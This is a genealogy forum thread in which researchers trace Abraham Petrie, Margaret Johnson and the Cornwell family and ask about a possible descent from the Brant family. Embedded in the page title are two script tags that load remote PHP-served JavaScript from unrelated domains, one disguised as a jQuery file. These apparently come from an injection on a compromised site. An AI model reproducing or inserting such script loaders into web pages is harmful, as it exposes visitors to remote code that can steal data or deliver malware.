Looking for Abram/Abraham Petry/Petrie<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script><script src="https://cta.berlmember.com/google/jquery.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for Abram/Abraham Petry/Petrie

Query by tcornwell

I know that Abraham Petrie married a Margaret Johnson in Canada, circa 1797. I am missing a generation that shows that Margaret is related to Joseph Brandt/Molly Brandt
Child of Margaret and Abraham is Mary Petrie, listed in a family bible as Indian
Mary Petrie married John Cornwell

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on 2012-07-31 17:09:24

tcornwell has been a Family Tree Circles member since Jul 2012.

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by jwessner on 2012-09-28 18:35:25

I have been researching the Cornwell side. I cannot seem to find anything on John Cornwell and Mary Petry. It is if they did not exist. I have found parents and children of him but nothing on the two of them. Where did you find your information?

by tcornwell on 2012-09-29 11:35:55

Nice to hear from a fellow Cornwell/Cornwall/Cornell researcher. I agree that "official" records are few and far between. I rely on the family bible starting information for John and Mary. Children of John/Mary: James Leonard 1842-1850, Thomas C 1844-1929, Abraham 1847-1847, Ellen 1847-1932, Samuel C 1850-1920, Mariah 1851-1851, John 1854-1854, Prudence 1856-1857, John B 1859-
I am looking for the parents of Margaret Johnson wife of Abraham/Abram Petrie/Petry. Sir William Johnson married into the Brant Family, and it is one generation that I am missing, that ties Margaret Johnson to Joseph Brant and sister Margaret "Molly" Brant.

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